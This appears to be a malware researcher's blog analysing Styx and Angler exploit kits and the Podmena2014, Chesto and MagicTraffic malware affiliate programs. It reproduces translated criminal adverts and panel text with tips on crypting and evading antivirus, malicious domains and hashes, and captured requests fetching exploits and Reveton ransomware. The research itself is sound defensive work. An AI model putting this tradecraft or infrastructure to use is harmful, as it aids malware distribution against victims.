(here first call www3. is missing)
Note the domain name


When I wrote about Styx one year ago :
Crossing the Styx ( Styx Sploit Pack 2.0 ) - Meet CVE-2012-4969 via JS - 2012-12-22
many noticed the similarities between Styx and Kein.

We can find 2 different kinds of landing for "Styx Kein".

- One titled "Sex Scandals" and featuring Emma Watson or Paris Hilton, then a fake Flash Player update


 Two Styx Kein Landings - 2013-11-05
("Sex Scandals")



Styx Kein "Sex Scandals" pass + Social Engineering
2013-11-05
(plugin detect in separate call)
0b80023884a167ebee695837aae4705a  <- Payload.

and the other one more in line with "standard" Styx featuring Yahoo Trends and now Yahoo Stocks

Styx Kein Landing - 2013-10-10

Styx "Kein" Yahoo stocks.
2013-11-05
(plugin detect in landing)
18e3389900a3f6db5c4acfa186a55012 <-- Payload

Payload is always Simda. We can see that it's the same stuff in a different flavor (in one case more adult/soc-eng)

(for those who want to compare, here is a more "standard" Styx:

Styx Pushing Shylock
2013-10-24
See jar with Random data
)

I won't study Styx "Kein" in detail (at least for now).
The exploitation graph should not be far from the one in Styxy Cool (+ CVE-2013-2472 (?) click2play bypass + CVE-2013-2465 + CVE-2013-2551 + some soc-eng)

So ?

Say Hello to Podmena 2014
Подмена means "substitution"
podmena2014.com
188.138.1.170
8972 | 188.138.0.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG

Whois :
-----------
Domain name: podmena2014.com
Registrar: Regtime Ltd.
Creation date: 2013-09-25
Expiration date: 2014-09-25

Registrant:
    Mahmud Perlov
    Email: muhameho@mail.cc
    Organization: private person
    Address: Voronova 37-48
    City: Hohlovka
    State: Voronezskaja
    ZIP: 589382
    Country: RU
    Phone: +7.4958293920

-----------

Advert :

Podmena 2014 Advert on Underground Forum



Original text (translated from Russian):
------------------------------------------
Search results substitution Podmena2014 / Up to $500 per 1k US / Exploit bundle+. Paying since 2009. Reliable with us
--
WHAT'S NEW
• INCOME UP TO $500 FROM 1K good US loads over 2 months
• WE PROVIDE A QUALITY EXPLOIT BUNDLE

ADVANTAGES
• WE HAVE BEEN PAYING SINCE 2009
• NEW CLICK CONVERSION SCHEME
• WE WORK DIRECTLY WITH FEED PROVIDERS
• PAYOUTS ON REQUEST AVAILABLE
• SPECIAL TERMS FOR BIG CLIENTS
• QUIET AND RESILIENT BOT
• WE ACCEPT EVERYTHING EXCEPT CIS AND CHINA

CONTACTS
• SUPPORT
◦ JABBER chesto-support@jabba.biz

◦ ICQ 983-382

◦ * Online 24 hours

• MANAGER
◦ JABBER cesto@thesecure.biz

◦ ICQ 444-846


REGISTER

http://podmena2014.com/?registration
Promo invite for October - d3d9446802a44259755d38e6d163e820


* This software is a new version of the well-known CHESTO
[Redacted]
* This software is adware and is not malicious software
------------------------------------------
Translated by google as :
------------------------------------------
The substitution issue Podmena2014/Do $ 500 to 1k US / Bundle +, a plateau since 2009. With us safely
--
INNOVATION
• INCOME UP TO 500 $ C 1K good US downloads 2 months
• MAKE A BUNCH OF QUALITY

BENEFITS
• WE PAY Since 2009
• NEW SCHEME CLICK THE ENVELOPE
• Works directly with the PID of Provo
• PAYMENT IS ON REQUEST
• SPECIAL CONDITIONS OF MAJOR CUSTOMERS
• QUIET AND tenacious BOT
• TAKE ALL EXCEPT THE CIS AND CHINA

CONTACTS
• support service
◦ JABBER chesto-support@jabba.biz

◦ ICQ 983-382

◦ * Online 24 hours

• MANAGER
◦ JABBER cesto@thesecure.biz

◦ ICQ 444-846


JOIN

http://podmena2014.com/?registration
Promo Invite for October - d3d9446802a44259755d38e6d163e820


* This software, new versions of many well-known CHESTO
[Redacted]
* This software is adware , and is not harmful for
------------------------------------------
For the record, the Chesto ad (translated from Russian) was like:
------------------------------------------
12.06.2011, 13:47
 Search results substitution "ChESTO V2" - 3rd year of operation and V2 [title cut off]
-
You are sitting at your computer reading, while someone else is relaxing right now?
Many have already done loads for a profitable affiliate program and see the money dripping in every day!


To celebrate our 2nd anniversary, we are releasing updated affiliate software, aimed at making sure you and we celebrate the 5th and 10th anniversaries too, with a pile of cash smile.gif


What's new in ChESTO v2?

[+] Referral commissions are now up to 20%!
[+] Increased exe check-in rate; we have data showing an 80-90% response
[+] Yield up to $300 in 30 days from 1k good US loads
[+] We have had bots since 2009; the exe's survivability has now been increased even further
[+] Really very quiet operation of the bot in the system
[+] Many small improvements in the scripts and the exe


Why the "ChESTO" affiliate program?

[+] Search results substitution brings a constant income, every day
[+] Alongside our bot you can load anything, be it Zeus or an antivirus
[+] Do a few thousand loads once and get up to 200 bucks and more every day*
[+] Bots don't live forever, but they really do bring you money for a long time
[+] Automatic payouts to your Webmoney wallet twice a month, no hold
[+] Automatic cleaning of the bot against antivirus, every 6 hours
[+] Special terms if you do lots of loads
[+] More than 2 years of stable operation of the affiliate program. Constant work on increasing profitability

* Income depends on the quality and quantity of loads
** We accept any loads from the countries: US, AU, CA, GB
*** Not everyone is admitted to the affiliate program; by interview over ICQ, write to us



Stats screenshots for the payment period (income / potential income)
Fresh
$518 / $2402 - 01.06-12.06.2011
http://s55.radikal.ru/i147/1106/38/cf712c1b6f07.jpg
$330 / $1386 - 01.06-12.06.2011
http://s05.radikal.ru/i178/1106/f0/f5e1dc42ce43.jpg

$1225 / $6367
http://s39.radikal.ru/i086/1106/63/99aa3d4eda74.jpg
$1604 / $3597
http://s42.radikal.ru/i096/1106/f1/45b58e477915.jpg
$508 / $2308
http://s45.radikal.ru/i107/1106/7a/b529250b629d.jpg
$1095
http://i074.radikal.ru/1106/6d/b1cc7a29a101.jpg
$2224
http://s46.radikal.ru/i112/1106/fc/f95fb51937bc.jpg

... one could go on praising and discussing the software, but until you actually see it working, you won't know how profitable it is
------------------------------------------
Translated by google as :
------------------------------------------
12.06.2011, 13:47 
 The substitution issue "ChESTO V2" - the third year of operation and V2 n
-
You sit at your computer and read , and someone is on a break ?
Many have already done downloading profitable affiliate program and see that the money is dropped every day!


In honor of the fact that we are 2 years old , released updated software affiliate program , which aims to ensure that we are pointed and 5th and 10th yubeley with a bunch of dough smile.gif


What's new in ChESTO v2?

[+ ] Affiliate payments are now up to 20 % !
[+ ] Increased otstuk eczema , there are data on the response of 80-90 %
[+ ] Yield of up to $ 300 within 30 days from 1k good US downloads
[+ ] We have boats since 2009 , is now further increased survivability of eczema
[+ ] Well, very quiet operation robot system
[+ ] Many small improvements in the scripts and eczema


Why affiliate "ChESTO"?

[+ ] The substitution issue brings a steady income every day
[+ ] With our bot can ship anything, even Zeus , though antivirus
[+ ] Once did a few pounds downloads and every day get up to $ 200 or more *
[+ ] Bots live not that forever , but really long time bring you money
[+ ] Automatic payment on your purse Webmoney 2 times a month , without hold
[+ ] Do automatic cleaning robot from antivirus every 6 hours
[+ ] Special conditions if you do lots of downloads
[+ ] More than 2 years of stable work affiliate . Is constantly working to increase the profitability of

* Income is dependent on the quality and quantity of downloads
** We accept all downloads of : US, AU, CA, GB
*** Allowed into the affiliate is not all , after an interview in ICQ , e-mail



Stat screens per pay period ( profit / revenue potential )
fresh
$ 518 / $ 2402 - 01.06-12.06.2011
http://s55.radikal.ru/i147/1106/38/cf712c1b6f07.jpg
$ 330 / $ 1386 - 01.06-12.06.2011
http://s05.radikal.ru/i178/1106/f0/f5e1dc42ce43.jpg

$ 1225 / $ 6367
http://s39.radikal.ru/i086/1106/63/99aa3d4eda74.jpg
$ 1604 / $ 3597
http://s42.radikal.ru/i096/1106/f1/45b58e477915.jpg
$ 508 / $ 2308
http://s45.radikal.ru/i107/1106/7a/b529250b629d.jpg
$ 1095
http://i074.radikal.ru/1106/6d/b1cc7a29a101.jpg
$ 2224
http://s46.radikal.ru/i112/1106/fc/f95fb51937bc.jpg

... you can continue to praise and discuss the software, but still do not really see how it works, do not know how profitable
------------------------------------------

Now here is how it looks inside :

Podmena2014 - News


Original text of the News (fresher than the screenshot; translated from Russian):
------------------------------------------

2013-10-31 11:14:34
Updated the script that pulls the exploit bundle URL, please everyone update it on your side. The script now accounts for a possible abnormal situation when the link is updated and, if needed, forwards the traffic to the previous link and writes "Redirect to last url" to the log.
2013-10-29 14:58:42
Servers updated, everything is ready. You can push traffic at maximum.
2013-10-29 14:24:24
We are reinstalling the software on the servers. Today there may be interruptions in the links and in stats updates. We are rolling out exe updates that will increase survivability. Most likely it will be ready tonight or tomorrow before noon.
2013-10-23 20:28:59
Updated the script that loads the current link to the bundle. Everyone is recommended to update their script. The info section has also been updated.
2013-10-23 15:24:40
We keep improving the software. A number of fixes in the exe and the bundle, which raised the check-in rate.
2013-10-21 16:40:03
A new version of the exe was released today. The software has been improved, the check-in rate has gone up, several fixes were made and operation was optimized, which will raise profitability.
2013-10-18 16:06:07
Added a handy script for updating the current domain of the bundle. See the promo section.

------------------------------------------
Translated by google as :
------------------------------------------

2013-10-31 11:14:34
Updated script to pull yurla ligament, please update it all for himself. The script takes into account the possibility of contingency when updating link and if that sends cores to the previous link , writes to the log Redirect to last url.
2013-10-29 14:58:42
Server upgraded, you're done. You can pour the maximum
2013-10-29 14:24:24
Reinstall the software on the servers. Today, possible disruptions links and update the stats . We implement updates eczema , which increased vitality. Most likely tonight or tomorrow before dinner is ready..
2013-10-23 20:28:59
Continue to improve the software. A number of fixes in eczema and bundle, which increased otstuk
2013-10-23 15:24:40
We keep improving the software. A number of fixes in the exe and the bundle, which raised the check-in rate
2013-10-21 16:40:03
Today released a new version of eczema . Software refined rose otstuk , made ​​several fixes , improved performance of that increase profitability
2013-10-18 16:06:07
Added handy script to update the current domain ligament. See promo


Podmena2014 - Stats
(note : Column Реферральные has now been removed)


Text for Statistics (translated from Russian):
------------------------------------------
Showing statistics for the period 2013.10.[r] - 2013.10.[r] for [redacted]
Statistics updated 2 min ago

* The bot ramps up in money terms over 3 days
* Final money stats within 5 days (main stats the next day)
* Push more US loads, it will bring you tens of times more money

XML statistics
------------------------------------------
Google translate as :
------------------------------------------
Shows the statistics for the period 2013.10.[r] - 2013.10.[r] to [redacted]
Statistics last updated 2 minutes ago

* Boat accelerates the money within 3 days
* Final stat on the money within 5 days (the main article the next day)
* Pour more US downloads, it will bring you ten times more money

XML statistics
------------------------------------------

Podmena2014 - XML Stats



Podmena2014 - Promo


Text for Promo (translated from Russian):
------------------------------------------
Installer

http://podmena2014.com/update.php?name=[redacted]&ukey=[redacted]
* Download the exe from this link to your own server. Exposing this link anywhere is forbidden
* Contains a rootkit for x64, and a good install can live up to a year
* The exe can only be downloaded once every 10 minutes
* It is advisable to update the exe every 3 hours
* If you use the exploit bundle, you don't need this file. It is already in there.
* To scan the exe, use only private services such as http://scan4you.net

Exe updated: 18 min ago
Exe_MD5: [redacted md5]

Exploit bundle

Get the current link to the bundle
* The domain is updated every 1-3 hours; be sure to re-pull the link every 5 minutes, the previous domain is switched off immediately and only the current one keeps working.
* This link will contain the current address of the bundle; pull it to your server with our script or by yourself
* Push only UNIQUE visitors, non-uniques are blocked. Countries: everything except CIS and China
* Average exploitation rate about 10%, up to 15-20% on good traffic. If yours is lower, push unique IE x32 browser visitors
* Script for pulling the link to your server. Upload this script to a writable folder on your side and send traffic to it; it does everything automatically and updates the link every 5 minutes.
------------------------------------------
Google translate:
------------------------------------------
http://podmena2014.com/update.php?name = [redacted] & ukey = [redacted]
* With this reference swing eczema on your server. Anywhere "shine " this link is prohibited
* Contains a Rootkit for x64 installs and good to live up to the year
* Download eczema can be only once in 10 minutes
* It is advisable to update eczema every 3 hours
* If you use a bunch , you will not need this file . There he was standing .
* To scan eczema only use private services like http://scan4you.net

Exe updated : 18 minutes ago
Exe_MD5: [redacted md5]

ligament
Get up- link to the bundle
* Domain is updated every 1-3 hours , be sure to tighten link every 5 minutes , the previous domain will be stopped immediately , there is only the current work .
* This link will contain the current address of the bunch, tighten it to your server or our own script
* Pour the only uniques , neuniki blocked . All of the countries except CIS and China
* Average breaking about 10%, on a good trafe up to 15-20 %. If you have less water the browser is IE x32 Unica
* Script to pull link to your server. Upload the script to myself this out in the open on the record folder, and pour it on the cores , it does everything automatically updates the link every 5 minutes.
------------------------------------------


The "update.php" link is for use with a third-party Exploit Kit (which will handle the download).
The script is for the iframe use case: it checks the link every 5 minutes and stores the landing locally.
Podmena2014 - Settings

Podmena2014 - Payment
Podmena2014 - part of Faq

Text for FAQ (translated from Russian):
------------------------------------------
Support
Jabber: chesto-support@jabba.biz
ICQ: 983382

Manager
Jabber: cesto@thesecure.biz
ICQ: 444846



  • Income pattern for substitution
    For example, you pushed 1k US installs. You see $2 per day in the stats; over a week the income ramps up to $8. Over 2 months that makes 60*8 = $480, and it keeps dripping in
  • Loads
    We accept any country except CIS and China
    That said, US gives the maximum income
    Good income from AU CA AG SG MC
    The other countries also bring in something.
  • Exploit bundle
    In the promo section you will see a link to the current bundle link, as well as a script that conveniently pulls the current link; the URL should be pulled every 5 minutes.
    Push only UNIQUE visitors, non-uniques are blocked. Countries: everything except CIS and China
    We rotate the domains, the bundle's exploit set is good, everything is cleaned automatically. Bundle stats will appear in the statistics. The domain is updated every 1-3 hours on average, so re-pull the link every 5 minutes; the previous domain is switched off immediately and only the current one keeps working.
    Bundle statistics are updated every 5-10 minutes
    The bundle is self-written, mostly Java
    It is best to push x32 machines (x64 are not always exploited). Browser IE x32, any OS; XP of course is exploited better.
    Average exploitation rate about 10%, up to 15-20% on good traffic
  • Why push traffic to us?
    With us you get reliability. We have been paying since 2009, and while we don't promise astronomical income from loads, we can keep paying for years while other affiliate programs close down. For example, some affiliate program pays 1000 bucks a month, runs for 6 months and brings in 6000. On the same loads with us, say, 800 bucks, but we can pay for 2 years and you get 19200. Even though it seemed the conversion was lower?
    With us you reliably get your money over a long time, and that is how you win.
  • Weekends and holidays
    On weekends and holidays people click less, so the income is lower too.
  • Payouts
    Payouts are automatic every 2 weeks, on the 3rd and the 18th.
    If you make more than $200 a day, we will pay out on request within 2 days
    Minimum payout $50.
  • Statistics updates
    Money statistics are refined over up to 5 days (this depends on the feed providers). Still, most of the money is on your balance the next day
    Install statistics in the admin panel are pulled every 30 minutes.
    Bundle statistics every 5-10 minutes.
  • Exe file
    The software is quiet, holds up well in the system and does not bother the user.
    Contains a rootkit for x64, and a good install can live up to a year
    We update the exe every 3 hours; the crypter update time can be arbitrary. We try to keep it clean as far as possible.
    Scanning the file with public AV checkers like VirusTotal is forbidden. Use private services such as http://scan4you.net
  • How to get the maximum income
    Push good, quality traffic
    Preferably don't push other affiliate programs at the same time as us
    Push more US loads
------------------------------------------
Google translate:
------------------------------------------
    support
    Jabber: chesto-support@jabba.biz
    ICQ: 983382

    manager
    Jabber: cesto@thesecure.biz
    ICQ: 444846

    • The format of return for substitution

    For example, you have merged US 1k units. You see in the article $ 2 per day , for a week income boosted to $ 8. Within 2 months turns 60 * 8 = $ 480 , and continues to drip

    • Downloads

    Accept any country other than the CIS and China
    Thus , the maximum yield gives US
    Good income from AU CA AG SG MC
    Other countries , too, so bring something .

    • Exploit Kit

    In the promo you will see a link to the actual link ligaments, as well as the script that is easy to pull up- link , is to pull yurl every 5 minutes.
    Leyte only Unico , neuniki blocked . All of the countries except CIS and China
    Domains change , set a bunch of nice , clean all automatically. Articles on bond will appear in the statistics. The domain is updated , on average, every 1-3 hours, so overtighten link every 5 minutes , the previous domain will be stopped immediately , there is only the current work .
    Stastistika by a bunch of updates every 5-10 minutes
    Samopisnaya bunch , mostly java
    It is best to pour x32 machines (x64 struggling at times). Browser IE x32, any OS , XP is certainly better beats .
    Average sample of about 10 % , on a good trafe up to 15-20 %

    • Why should we cast it ?

    With us, you get the reliability . We pay since 2009 and even though we do not promise space revenues from downloads , and we can not pay for years, while others will close affiliate . For example , some sort of affiliate program pays $ 1,000 a month, affiliate worked for 6 months and brought 6000 . At the same batches have , for example, $ 800 , and we can pay the 2 years and you get 19,200 . Although it seems like that the envelope was smaller?
    With us you will surely get your money for a long time and this win .

    • Weekends and holidays

    On weekends and holiday people click less , respectively, and less income .

    • payments

    Payments are automatically every 2 weeks in the third and 18th numbers.
    If you have a sum of more than $ 200 a day - will make the payment on request within 2 days
    The minimum payout is $ 50.

    • update statistics

    Statistics on money specified to 5 days (depending on the feed providers) . At the same time , most of the money on the balance sheet is already on the next day
    Statistics and admin for the settings , overtighten every 30 minutes.
    Statistics on the bond every 5-10 minutes.

    • eczema file

    Soft quiet, the system is holding up well , the user does not interfere.
    Contains Rootkit for x64 installs and good to live up to the year
    Eczema update every 3 hours - time updates kripter can be arbitrary. We try wherever possible to keep it clean .
    Forbidden to scan the file pablikovymi AV checker, type VirusTotal. Use private services , such as http://scan4you.net

    • How to get the maximum income

    Leyte good quality traffic
    Along with us , it is advisable not to pour other affiliate
    Pour more US downloads
    ------------------------------------------

    Now you know what to expect when you see a >900 KB file named pod.exe :)

    But to be honest, I wonder if I don't now have more questions than answers.

    Podmena is tied to the Styx "Kein" "Yahoo Stocks" landing (maybe to the other one too; I didn't see it myself).
    I can't say for sure it's the only Affiliate pushing that stuff.
    What is the link between Styx and Styx Kein? We know there are many options in Styx to do exactly what is being done by this Affiliate. The API seems powerful.

    We could talk about the order in which CVEs appear in different instances of Styx, but I guess you are already bored enough :)

    Read More :
    Styx Exploit Kit installing Simda - 2013-10-08 - Jose Miguel Esparza - Eternal-Todo
    MSRT September 2013 - Win32/Simda - 2013-09-10 - Microsoft
    A "Styxy" Cool EK ! - 2013-07-01

    CVE-2013-0074 (Silverlight) integrates Exploit Kits



    Angler EK is definitely on the move. It's not a huge surprise when we can speculate that the team behind it is the same one that was first using Cool EK (Paunch's VIP customer) and is behind the Reveton threat.

    After integrating CVE-2013-0634 last week



    EKWatcher has spotted a new change today: the Silverlight check has now been activated and delivers an exploit.
    Pedro Marinho from Emerging Threats pointed out links with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure

    (right now I don't understand why CVE-2013-3896 is mentioned here. I will update if I learn more about it)

    CVE-2013-0074 pass in Angler EK :

    CVE-2013-0074 successful pass in Angler EK
    2013-11-13


     Silverlight 5.1.10411.0 Addon In IE  used in that pass

    Note: I made a pass with Silverlight 5.1.20513.0: safe, as the fire condition told us.


    GET http://peragretisque.yevgenimalkin .com/leoccvkead
    200 OK (text/html)

    Silverlight version checks
    Angler EK 2013-11-13


    Deciding if Silverlight must be fired : "sterlings"
    in Angler - 2013-11-13


    Call for Silverlight Exploit in Angler 2013-11-13
    GET http://peragretisque.yevgenimalkin .com/0leoccvkeadmnp
    200 OK (text/html)

    Silverlight Call
    Content of that zip
    Dll TimeStamp


    The DLL ( 5f36a4c019d559f1be9fdd0cd770be2e ) would be worth some work, but as is often the case, I do not have the knowledge right now to provide useful data. I will link any analysis that may come.

    GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
    200 OK (application/octet-stream) Xored Reveton Ransomware.

    One of the US Reveton Design
    2013-11-13
    Firefox ?
     Silverlight 5.1.10411.0 Addon In Firefox 17
    Interaction is required :
    Firefox Warning on Silverlight call from Angler EK
    2013-11-13
    If you click... Boom...
    Silverlight 5.1.10411.0 - Firefox 17
    Angler EK 2013-11-13
    Files :
    Here is a Pcap
    (Courtesy of Will Metcalf from Emerging Threats).

    Here is a Fiddler

    Read More :
    Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure Authored by Vitaliy Toropov
    CVE-2013-0074 NIST
    Lua Script by  Emerging Threats  to detect the exploitation in Suricata (can also be run from Command line)

    MagicTraffic : a look inside a Zaccess/Sirefef affiliate



    Thx @Horgh_rce for the time spent studying different sets of samples.

    There are at least 2 affiliates spreading Zaccess/Sirefef.

    - MagicTraffic
    - Sti Ppi

    Maybe (?) a third one: SmartPrivate (?) (which could be tied to Magnitude).
    But SmartPrivate and MagicTraffic binaries seem to be really similar... (sub-affiliate?)

    As with all affiliate stuff, you may land on it in many different ways.
    Here are some (drive-by focused) illustrations:

    Zaccess (from MagicTraffic) pushed in Styx
    2013-11-17
    Zaccess (MagicTraffic one) pushed in Neutrino
    2013-10-15
    4 is Zaccess (MagicTraffic variant)
    2nd Stage Payload of a Dropper pushed in Nuclear Pack
    2013-10-16




    Let's take a look at MagicTraffic.

    MagicTraffic Advert
    Text of the Advert (translated from Russian):
    ------------------------------------------
    MagicTraffic clickbot affiliate program
    Dear users of the [redacted] forum, we present to your attention a new clickbot affiliate program, MagicTraffic.

    Distinctive features:
    - Only a clickbot and nothing more, which means that on clean traffic, without mixing in software that could harm the user's computer, the bot will live as long as possible and earn you $500-600 for every 1000 US installs pushed.
    - The bot does not need Administrator rights to work, so the check-in rate and bot activity are higher than with comparable products.
    - A wide set of feed providers, guaranteeing a stable and high yield.
    - Converting countries: US CA GB AU FR DE ES
    - Weekly payouts without hold to Webmoney, Epese or Wire Transfer.
    - Higher rate for the first testers

    Let me add a few important points. Any kind of traffic converts; the bot works great as an addition to other solutions, but it also pays for itself many times over on its own

    Dive into the world of magical conversion and fabulous earnings with MagicTraffic

    Contacts:
    ICQ #1: 923232
    ICQ #2: 932922
    Jabber: magictraffic@jabber.no (OTR welcome)
    ------------------------------------------
Translated by Google as :
    ------------------------------------------
    Affiliate for clicbot MagicTraffic
    Dear forum users [redacted], your attention is the new affiliate program on klikbotu MagicTraffic.

    Distinguishing features :
    - Only klikbot and nothing more , and that means that the rate of traffic on the net , without mixing software that can harm the user's computer , the bot will live as long as possible and enrich you for $ 500-600 each fusion 1000 US installs .
    - To work , the bot does not require Administrator rights on this otstuk and activity bots higher than the counterparts.
    - A wide range of feed providers to guarantee stable and high exhaust.
    - Convertible country : US CA GB AU FR DE ES
    - Weekly payments without hold on Webmoney, Epese or Wire Transfer.
    - The first testers increased rtg

    Add a few important point . Converted all kinds of traffic , the bot is perfect as an addition to other solutions , but also in itself pays off

    Immerse yourself in a world of magic and fairy envelope with earnings MagicTraffic

    Contacts:
    ICQ # 1: 923232
    ICQ # 2 : 932,922
    Jabber: magictraffic@jabber.no (OTR welcome)
    ------------------------------------------

    February 2013 :
    ------------------------------------------
To stir up interest, I am happy to announce that from February 23, for one week, everyone's rate will be raised by 5%

For our current and prospective partners, here is the list of countries that it makes sense to send to us.
They are divided into groups by conversion level, starting with the TOP countries and ending with the countries with the lowest bids.
US | CA, AU, GB, NZ | DE, FR | ES, IT, SE, NL, AT, IL, CH, DK, NO | AR, BZ, ID, TH, SG, SA, AE, MY

Payouts, as they should, go out steadily.

For any questions you may have, welcome at magictraffic@jabber.no
    ------------------------------------------
    Google Translated as :
    ------------------------------------------
    To warm interest in a hurry to announce that on February 23 a week all will be raised by 5% rtg

    For our current and potential partners announce the list of countries that it makes sense to send to us.
    They are divided by the level of the envelope on the group, starting with the top countries, ending the countries with the lowest bidami.
    US | CA, AU, GB, NZ | DE, FR | ES, IT, SE, NL, AT, IL, CH, DK, NO | AR, BZ, ID, TH, SG, SA, AE, MY

    Payments, as it should be, go steadily.

    If you have any questions, Welkom in magictraffic@jabber.no
    ------------------------------------------

In June 2013 the following were added:
    JP AT BE BR FI  HK IE KR MX ZA

    MagicTraffic - Login Screen
    End of 2013
    Magic Traffic 2013-11
    News
Text of News (translated from Russian) :
------------------------------------------
04.10.2013
Pre-New Year promotion)
Dear and beloved partners) The MagicTraffic team has prepared a promotion for you with impressive cash prizes that will help you welcome the new year 2014 in a colorful and memorable way :)

All advertisers who deliver certain volumes of installs between 5.10.2013 and 24.12.2013 will have cash bonuses credited to their balance, which will go out with the payout of 25.12.2013

Terms of the promotion:

Having made a certain number of installs on your account, you have the opportunity to receive a one-time cash bonus to your balance:
25000 installs + $500
50000 installs + $1000
100000 installs + $2000
150000 installs + $5000
250000 or more installs + $10000

Counting and crediting of bonus funds will take place on 25.12.2013 based on the state as of 23:59:59 on 24.12.2013. Payout of your balance + bonus funds will take place on Wednesday 25.12.2013 at the usual time.


* The promotion applies only to unique (accepted) installs;
* To receive the bonus, more than 80% of your installs must be USA installs;
* The maximum amount credited to a single account is $10000;
* The number of accounts to which bonus amounts will be credited based on the results of the contest is not limited;
* Installs must be of good quality (average conversion per 1k must be no lower than $300);
* No restrictions will be placed on accounts for the duration of the promotion; conversion, check-in rate and everything else will remain as in the affiliate program's normal mode of operation.

13.09.2013
Exploit kit rental
Dear partners, as an advertisement, we offer you to consider an offer to rent an exploit kit:

We present to your attention the Whitehole exploit kit:

- always clean, up-to-date applets; CVE-2013-2465 is currently in use;

- its own domains, automatically created and automatically killed, which protects traffic sources from abuse complaints;

- can be rented either for $ or for a %;

- average penetration rate at the time of writing this advert is 10%;

- hits IE + Chrome and FF (but to a lesser extent than IE).


For details, knock on Jabber: whitehole@thesecure.biz

18.08.2013
Statistics
Dear partners, as you have noticed, yesterday's and today's statistics are missing or incomplete. I hasten to assure you that everything will be restored this evening and all amounts for the previous days will be filled into the stats as usual.

08.08.2013
exe update
Dear partners! Keeping up with market trends, we have released an improvement to our exe concerning survivability. From now on your installs will live longer and, accordingly, bring you more income for even more time.
All active partners are asked to update their exe as soon as possible.

03.07.2013
Crypting
Dear partners! For those who are having difficulties with our crypter, we will select and recommend third-party crypting services for you that can correctly crypt our exe and make it as clean as possible for you.

RoboService
jabber: robocrypt@theissen.org / icq: 784834

Minimum top-up: $100 - 6 crypts.
Round-the-clock support, automatic crypting (if there is money on the balance there is no need to contact support).

There are also discounts for a larger number of crypts with a one-time top-up: $200 - 14 crypts / $300 - 22 crypts / $500 - 40 crypts / $1000 - 100 crypts

ATTENTION! Unlike our own crypt, we give no guarantees for third-party crypts. While for our own crypt we run full-scale functionality tests at every file update, we cannot vouch for third-party crypts and their functionality. We therefore recommend, when using third-party crypts, to watch the check-in rate and the number of successful installs in our admin panel, or to periodically send us files crypted by third-party services for testing.

PS: If you do not have access to the uncrypted version of the file, contact support
    ------------------------------------------
Translated by Google as :
    ------------------------------------------
    04.10.2013
    New Year's rally )
    Respected and loved by our partners ) MagicTraffic team has prepared for you to share with impressive cash prizes that will help you meet the colorful and memorable new 2014 :)

    All adverts , made in the period from 05/10/2013 on 12/24/2013 installs certain amounts will be added to the balance of cash bonuses , which will go to the payment 25.12.2013

    Terms and Conditions:

    Having done a number of installs on your account you will have the opportunity to get one-time cash bonus to your balance :
    Installs 25,000 + $ 500
    Installs 50,000 + $ 1,000
    Installs 100,000 + $ 2,000
    Installs 150,000 + $ 5,000
    250,000 or more installs + $ 10,000

    Calculation and accrual of bonus money will be on 25.12.2013 at 23:59:59 24/12/2013 . Payment of your balance + bonus money will be on Wednesday 25.12.2013 at the usual time .


    * Offer applies only to the unique (accepted) installs ;
    * To receive the bonus in your installation has to be more than 80 % USA installs ;
    * The maximum amount credited to the same account - $ 10,000;
    * The number of accounts , which will be credited to the bonus amount in the competition is not limited to ;
    * Installs must be of high quality ( average envelope with 1k must be no less than $ 300 ) ;
    * There are no restrictions on the accounts at the time the shares will not be imposed - the envelope , otstuk etc. remain as in the normal operation of the affiliate .

    13.09.2013
    Rent ligament
    Dear Partners , for publicity invite you to consider a proposal to lease bundles :

    We offer you a bunch of exploits Whitehole:

    - Always clean current applets , currently in the CVE- 2013-2465 ;

    - Their domains are automatically generated and automatically killed than protect traffic sources from abuse ;

    - The ability to rent as well as a $ per %

    - Breaking through the middle of the writing of ads - 10%;

    - Banging s + Chrome and FF ( but less than s) .


    For details, knocking into a toad : whitehole@thesecure.biz

    18.08.2013
    statistics
    Dear partners, as you have noted - yesterday and today there is no or incomplete statistics. I hasten to assure you that all voostanovitsya tonight and all amounts for the previous days, as well as usually will reach out in the article.

    08.08.2013
    exe update
    Dear Partners Keeping up with the trends of the market, we released our improvement exe that concerns survivability. From now on, your installs will live longer, and therefore brings more income you even more time.
    All active partners request as soon as possible to update your exe .

    03.07.2013
    crypts
    Dear Partners For those who have difficulty with the crypt of our event , we will select and advise you to third-party kriptoservisy that can correctly kriptovat our exe and do it for you as clean as possible .

    RoboService
    jabber: robocrypt@theissen.org / icq: 784834

    Minimum Deposits: $ 100 - 6 crypts .
    Round the clock , automatic crypt ( if you have money on the balance sheet contact tech support is not necessary .)

    Just prisutsvujut discounts for larger kolichetsvo kritpov at the completion of one-time $ 200 - 14 crypts / $ 300 - Crypt 22 / $ 500 - 40 crypts / $ 1000 - 100 crypts

    WARNING ! Unlike our crypt , we do not give guarantees to third party crypt . If we spend our crypt full-scale tests on the performance for each apdeyte file, for third-party crypts and their performance we can not vouch . For this we recommend the use of third-party crits - otstuk and look at the number of successful installs in our admin or periodically transmit nav files kriptovat third-party services to us for a test .

    PS: If you do not have access to nekriptovannoy version of the file , please contact our support
    ------------------------------------------
Note: the end of year Rally :) (also advertised on forums).
Note also the advert for Whitehole.
(September, a few weeks after WhiteHole came back from a 5-month "vacation")



    Magic Traffic - Statistics
I was wondering if I should blur (the account is now "burnt"). But I think numbers for a click bot are interesting.

It's a small account. In 5 months of activity :

    2013-06-17 to 2013-11-17
    XML Stats
(same kinds of "Out" as we could see in Podmena)
    Magic Traffic - Profile
    MagicTraffic - Payment

    MagicTraffic - Promo
Text of Promo (translated from Russian) :
------------------------------------------
Crypted file    File updated 3 hour(s) ago

Useful tips:
- The crypter is polymorphic. If the exe is too dirty, try downloading it again so the random detections go away.

- Request the file no more than once every 15 minutes.

- Do not use public AV scanners like "VirusTotal"; there are plenty of excellent private services ;)

- Update the file at least once a day.

- If you push many files from different affiliate programs, profit may start dropping across all of them ;)

- Good traffic = good profit.

- Today's statistics are better viewed the next day.

- US traffic = good profit.
    ------------------------------------------
    Google Translate :
    ------------------------------------------
    Kriptovat File updated 3 hour (s ) ago

     Download
    Useful tips:
    - Kriptor polymorphic . If the exe is too dirty - try to download it again to randomly missing detective.

    - File not more than 1 time in 15 minutes.

    - Do not use public AV scanners like " virustotala ," there are many wonderful private services ;)

    - Update file for at least 1 time per day.

    - If you pour a lot of files with different companions - profit may begin to fall on all affiliate ;)

    - Good traffic = good profit .

